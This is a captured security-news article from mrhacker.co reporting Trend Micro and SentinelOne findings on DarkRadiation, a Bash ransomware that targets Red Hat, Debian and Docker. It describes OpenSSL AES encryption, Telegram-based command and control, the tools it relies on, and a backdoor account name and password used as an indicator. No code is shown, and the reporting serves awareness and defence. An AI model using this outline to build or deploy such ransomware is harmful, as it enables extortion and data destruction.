mrhacker.co Open in urlscan Pro
2606:4700:3037::6815:15a2  Public Scan

Form analysis
1 forms found in the DOM

GET https://mrhacker.co/

<form method="get" id="searchform" action="https://mrhacker.co/">
  <input type="text" name="s" id="s" value="Type search term and press enter" onfocus="if (this.value == &quot;Type search term and press enter&quot;) { this.value = &quot;&quot;; }"
    onblur="if (this.value == &quot;&quot;) { this.value = &quot;Type search term and press enter&quot;; }">
  <input type="hidden" id="searchsubmit" value="Search">
</form>

Text Content

 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 

 * Home
 * Hacking News
   * Arrests
   * Botnet
   * DDOS
   * Data Breach
   * Leaks
   * Phishing
   * Social Engineering
   * Scams
   * Website Defacement
   * Malware
   * Viruses
   * Ransomware
 * Geek
   * Reviews
   * Android
   * Linux
   * Mac
   * Windows
 * Internet Security
   * Banking
   * Cryptocurrency
   * Data Security
   * Incidents
   * Mobile Security
   * Opinion
   * Privacy
   * Small business
   * Social Engineering
   * Social Media
 * Cyber Security
   * Cyber Attack
   * Cyber Crime
   * Cyber Events
 * Hacking
   * Hacking Groups
   * Hacking Tools
   * Tutorials
   * eBooks
   * Web Hacking
   * Windows Hacking
   * Wireless Hacking
 * Pentest
 * Hackers Repository
 * How To
 * Lists


MRHACKER

 * Home
 * Hacking News
   * Arrests
   * Botnet
   * DDOS
   * Data Breach
   * Leaks
   * Phishing
   * Social Engineering
   * Scams
   * Website Defacement
   * Malware
   * Viruses
   * Ransomware
 * Geek
   * Reviews
   * Android
   * Linux
   * Mac
   * Windows
 * Internet Security
   * Banking
   * Cryptocurrency
   * Data Security
   * Incidents
   * Mobile Security
   * Opinion
   * Privacy
   * Small business
   * Social Engineering
   * Social Media
 * Cyber Security
   * Cyber Attack
   * Cyber Crime
   * Cyber Events
 * Hacking
   * Hacking Groups
   * Hacking Tools
   * Tutorials
   * eBooks
   * Web Hacking
   * Windows Hacking
   * Wireless Hacking
 * Pentest
 * Hackers Repository
 * How To
 * Lists


News


DARKRADIATION RANSOMWARE TARGETING REDHAT, DEBIAN LINUX DISTRIBUTIONS

By root
Posted on September 10, 2021

Share
Tweet
Share
Share
Email





THE NEWLY DISCOVERED DARKRADIATION RANSOMWARE CHAIN IS UNLIKE ANY OTHER
RANSOMWARE FAMILY.

Trend Micro cybersecurity researchers have shared findings of a newly identified
ransomware strain dubbed DarkRadiation. The ransomware strain is entirely
written in Bash, and this aspect makes it difficult for most security software
to detect it as a threat.

SEE: Revil ransomware gang hits US nuclear weapons contractor

Its primary targets are Linux and Docker Cloud containers, which is particularly
concerning for enterprises. Moreover, it relies on Telegram to initiate
communication with its C&C server.

> “The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The
> malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various
> directories. It also uses Telegram’s API to send an infection status to the
> threat actor(s),” researchers noted in their report.


ABOUT DARKRADIATION RANSOMWARE

The ransomware was first detected by Twitter user @r3dbU7z on 28 May. Later, it
was analyzed by Trend Micro researchers. It is reported that the ransomware was
discovered as part of a range of hacker tools through VirusTotal. The tools were
hosted on the threat actor’s infrastructure in a directory titled “api_attack.”







Currently, there’s no information on the ransomware’s delivery methods or its
in-the-wild attack evidence. But, when its different components were assessed,
researchers noted that the developers want to use it to target Linux installs
and Docker containers.

DarkRadiation ransomware’s ransom note


DARKRADIATION INFECTION CHAIN DETAILS

DarkRadiation’s infection chain is a multi-stage process comprising a complex
set of Bash scripts and around six C&Cs, all offline when the report was
published. The ransomware uses hardcoded API keys to communicate with Telegram
bots, and the scripts have several dependencies, such as curl, wget, OpenSSL,
sshpass, and pssh.







DarkRadiation downloads the required tools through the YUM/Yellowdog Updater,
Modified if a device doesn’t support any of these. It is a python-based package
manager used by popular Linux distros, including RedHat and CentOS.

SEE: Iranian hackers hit Israel with disk wiper in disguise of ransomware

In the final stage, the ransomware retrieves a list of users available on the
infected device, overwrites their passwords with a mega-password, and deletes
all shell users after creating a new user with the ID “Ferrum” and password
“MegPw0rD3,” wrote SentinelOne researchers in a separate blog post.





Related Items:DarkRadiation, Hacking, Linux, malware, ransomware
Share
Tweet
Share
Share
Email

RECOMMENDED FOR YOU

 * $120 charging cable O.MG remotely steals data from Apple devices
 * FIN8 Resurfaces with New Sardonic Backdoor
 * Konni RAT variant targeting Russia in ongoing attack campaign


Comments




LATEST NEWS

 * 3.9K
   Data Security
   
   
   SECURITY RISKS TO YOUR MOBILE APP AND HOW TO AVOID THEM
   
   Mobile devices, while convenient tools for communication and engagement, also
   come with their fair...

 * 3.1K
   Data Security
   
   
   $120 CHARGING CABLE O.MG REMOTELY STEALS DATA FROM APPLE DEVICES
   
   Originally, O.MG Cable was introduced in 2019. In 2019, at DEFCON, an IT
   security...

 * 1.8K
   Data Security
   
   
   MICROSOFT WARNS OF CREDENTIAL PHISHING ATTACK ABUSING OPEN REDIRECT LINKS
   
   So far, the ongoing phishing attack has utilized more than 350 unique domains
   to target...

 * 3.9K
   Data Security
   
   
   BANGKOK AIRWAYS HIT BY LOCKBIT RANSOMWARE; LEAKS 103GB OF DATA
   
   The Lockbit ransomware gang also claimed to have ”extra 200 GB” worth of
   Bangkok...

 * 2.4K
   Data Security
   
   
   ANDROID GAME DEVELOPER ESKYFUN EXPOSED 1 MILLION GAMERS TO HACKERS
   
   EskyFun stored a trove of gamers’ data on an Elastricsearch server that was
   exposed...



LINKS





MrHacker on security is a Cyber Security platform that covers daily Cyber
Security News, Hacking News, Hacking Tutorials and Technology updates.

Our mission is to keep the community up to date with happenings in the Cyber
World with slogan: MrHacker - Think, Talk, Hack.

 * 
 * 
 * 
 * 
 * 
 * 
 * 
 * 


QUICK LINKS

 * Home
 * Latest News
 * Section
 * Topic
 * About Us
 * Contact
 * Advertise With Us


HOT TOPIC

Hacking malware Internet Cyber Crime Security android Google Linux privacy
cybersecurity facebook Cyber-Attack ransomware Apple hacking news Microsoft
vulnerability Cyber Security Anonymous DDoS cryptocurrency data breach cyber
attacks breach Bitcoin Defacement Dark Web Data NSA Open Source windows 10 FBI
Leaks fraud hackers iPhone computer security Windows technology Hacked backdoor
iOS phishing china Government cyber-threats ethical hacking Chrome Encryption
cyber security news
 * Contact Us
 * Privacy Policy

Copyright © 2019 MrHacker.Co - Think, Talk, Hack

To Top







PIN IT ON PINTEREST


 * 
 * 
 * 
 * 
 * 
 * 
 * 


Share This
 * Facebook
 * Twitter
 * Digg
 * Pinterest
 * Delicious
 * reddit
 * LinkedIn